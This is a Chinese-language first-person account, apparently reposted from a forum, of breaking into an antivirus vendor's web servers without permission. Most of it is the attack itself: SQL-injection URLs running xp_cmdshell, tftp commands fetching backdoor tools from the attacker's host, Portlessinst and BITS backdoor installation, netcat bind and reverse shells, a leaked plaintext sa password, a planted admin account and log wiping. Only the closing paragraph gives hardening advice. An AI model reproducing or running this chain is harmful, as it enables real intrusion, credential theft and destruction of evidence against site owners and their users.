再次渗透国内XX知名杀毒软件厂商网站全记录

___ .X..}.......... <Enter>.....
看来ip地址为：xxx.xxx.xxx.233的确是另外一台主机。而且还额外开放了5631端口。先不管那么多了。
刚才已经利用SQL Injection把bits传到.xxx.xxx.xxx.233主机的c:\winnt\system32目录下。注意：利用sql配合tftp上传文件都是在对方的winnt/system32目录下。SQL Injection也不例外。接下来提交url：
http://xxx.xxxx.com/message.asp?ID=1';execmaster.dbo.xp_cmdshell'rundll32.exe BITS.dll,Install zihuan';----
我来解释一下：这句话的意思就是把bits后门的特征字符指定为zihuan并且安装bits。至于bits我曾经在X挡案上发表过相关文章。我在这里就不过多解释了。
接下来提交URL:
一切安装成功以后马上在本机用nc连接目标的80端口。命令为nc –vv xxx.xxx.xxx.233 80 然后输入命令：zihuan@dancewithdolphin[xell]:99这个命令的意思就是把cmdshell绑定在对方的99端口上。然后在用nc –vv xxx.xxx.xxx.233连接目标的99端口。结果是NC好长时间没有反映最后失败了。我分析失败的原因可能有两个
1 该主机安装有防火墙导致连接不上。
2 bits在上传的时候被主机安装的杀毒软件给杀了。
。我马上想出了bits还有反弹连接功能。接着在肉鸡上用nc –l –p 100来监听100端口。然后在nc –vv xxx.xxx.xxx.233 80输入命令：zihuan@dancewithdolphin[rxell]:218.xxx.xxx.xxx 100然后回到肉鸡用NC监听的100端口一看…昏！还是没有任何反映。由于我是利用SQL Injection安装的bits所以根本看不到回显。可以判断bits保证是被杀了。这时候我想起来刚才一开始提交过';exec master.dbo.xp_cmdshell 'net start telnet'----所以马上在telnet xxx.xxx.xxx.233还是很长时间都没有反映。说明这个xxx.xxx.xxx.233保证安装有防火墙。
防火墙配合杀毒软件说明这个主机还是很安全的。渗透试验到了这里已经进入了僵局。可现在的我还是不甘心 。我在这时又想起来了一个类似bits的后门程序。名字叫portlessinst。只有两个文件分别为portlessinst.exe和SvchostDLL.dll我马上把这两个文件放在了肉鸡tftp的目录下。然后在提交url：http://xxx.xxxx.com/message.asp?ID =1 ;exec master.dbo.xp_cmdshell tftp -i 218.xxx.xxx.xxx getportlessinst.exe
和
http://xxx.xxxx.com/message.asp?ID =1 ;exec master.dbo.xp_cmdshell tftp -i 218.xxx.xxx.xxx SvchostDLL.dll
提交以后看肉鸡的tftp显示下载成功。我马上开始安装。
Portlessins的安装格式为：

ortlessinst.exe -install <特征字符> <连接密码>
我指定特征字符为zihuan连接密码为ziHUAN马上提交rul
http://xxx.xxxx.com/message.asp?ID =1 ;exec master.dbo.xp_cmdshell ‘Portlessinst.exe -install zihuan ziHUAN’
然后把ortlessinst.exe注册为系统服务。命令为net start iprip马上又提交url
http://xxx.xxxx.com/message.asp?ID =1 ;exec master.dbo.xp_cmdshell ‘net start iprip’
提交这个url返回正常页面有点慢因为一般利用SQL Injection启动系统服务都很慢。想当黑客一定要有耐心哦：）
不一会返回正常页面。说明启动服务成功。接下来就是连接了。
先用命令nc –vv xxx.xxx.xxx.233 80
然后输入特征字符和端口命令为zihuan:80这句话的意思就是把shell绑定在80端口上。
接下来在nc –vv xxx.xxx.xxx.233 80看下图：

各位读者看到这里不要不相信自己的眼睛。我的确是在80端口拿到shell的。我成功的利用Portlessinst把shell绑定在了80端口上穿透了xxx.xxx.xxx.233的防火墙。端口重复利用是Portlessinst的最大好处。我曾经N次利用Portlessinst穿透目标主机的防火墙无论是软件和硬件防火墙或者是边界路由。真是屡试不爽。
OK。现在我非常激动。已经成功的进入了这个XX杀毒软件厂商的其中一台主机。可是我最初的愿望是渗透这个XX杀毒软件厂商web所在的主机所以现在有点不甘心。继续在我已经进入这台主机上疯狂收集信息。进入了D盘发现在D盘下有一个叫DATA的目录。进去以后全是htm和asp文件。我估计这个可能是这个杀毒厂商软件网站的备份文件。我现在根本没有时间详细看这些网页文件。我很害怕被对方管理员发现。我找着找着发现在data目录下还有一个data目录。进去以后我看到了一个叫conn.asp的文件。看到这个文件我眼前一亮马上输入命令type conn.asp回显为以下：
<%@LANGUAGE="VBSCRIPT"%>
省略……    
strSQLServerName = "202.xxx.xxx.xxx"   trSQLDBUserName = "sa" 

strSQLDBPassword = "#k>2004"        strSQLDBName = "user"    

'SQL Server OLE Driver
Set conn = Server.CreateObject("ADODB.Connection")
省略……
Set conn = Nothing
End Function
%>
哈哈。这下可爽了。里面最关键的几句话有。


strSQLServerName = "202.xxx.xxx.xxx "   trSQLDBUserName = "sa" 

strSQLDBPassword = "#k>2004"        strSQLDBName = "user"    

' strSQLServerName = "202.xxx.xxx.xxx "这句就是服务器的IP地址。正好与该杀毒厂商网站是一个IP地址。就是我一开始想渗透的这个服务器的IP地址。strSQLDBPassword = "#k>2004"这句话的意思是sa的密码为#k>2004.有了这些我马上拿出了流光自带的sql连接器进行连接。看下图：


连上以后为了测试权限我在上面加了一个用户为:zihuan密码为：ziHUAN果然是system权限。最后用tftp上传了LogKiller.exe然后执行清理掉了所有的日志文件。然后删除了我刚才建立的zihuan用户。后门也不用在留了。知道sa的密码就是最好的后门。不过我清理了人家所有的日志我知道很快就会被发现的。这里有人要问了为什么不开3389单个清理掉自己留下的日志？
一般象这样的主机都有技术很好的网管进行维护的。开3389会重启服务器。我不想没清理日志就给服务器重启。这样做是很危险的。到了这里渗透就接近尾声了因为成功以后就对这两个主机没有任何兴趣了。

事件回顾

再一次渗透成功了国内这么有名气的杀毒软件厂商感觉真的很爽很刺激。多亏了Portlessinst帮我穿透了防火墙要不然渗透计划半道就会破产。Portlessinst真是一个好东西。大家可以自己试验试验。象这次渗透里面的有些asp程序和sql server根本不在一台服务器上。有些hacking的时候需要多分析才能最后达到目的。一定要对自己有足够的自信心这样才能最终成功。
通过渗透说明国内的网络安全意识还不是很强。现在很多网站都存在SQL Injection足已说明安全是一个整体。小疏忽也会造成主机整个被入侵者控制。在这里紫幻提醒广大网管朋友一定要把自己站上的asp程序充分过滤。比如:’等等。需要sql支持的web 程序一定要利用低权限的sql用户。使用sa是绝对危险的。并且要删除sql server的一些扩展过程。比如xp_cmdshell……这样才会使主机更加安全。
（出处：viphot）

关键词：再次渗透国内XX知名杀毒软件厂商网站全记录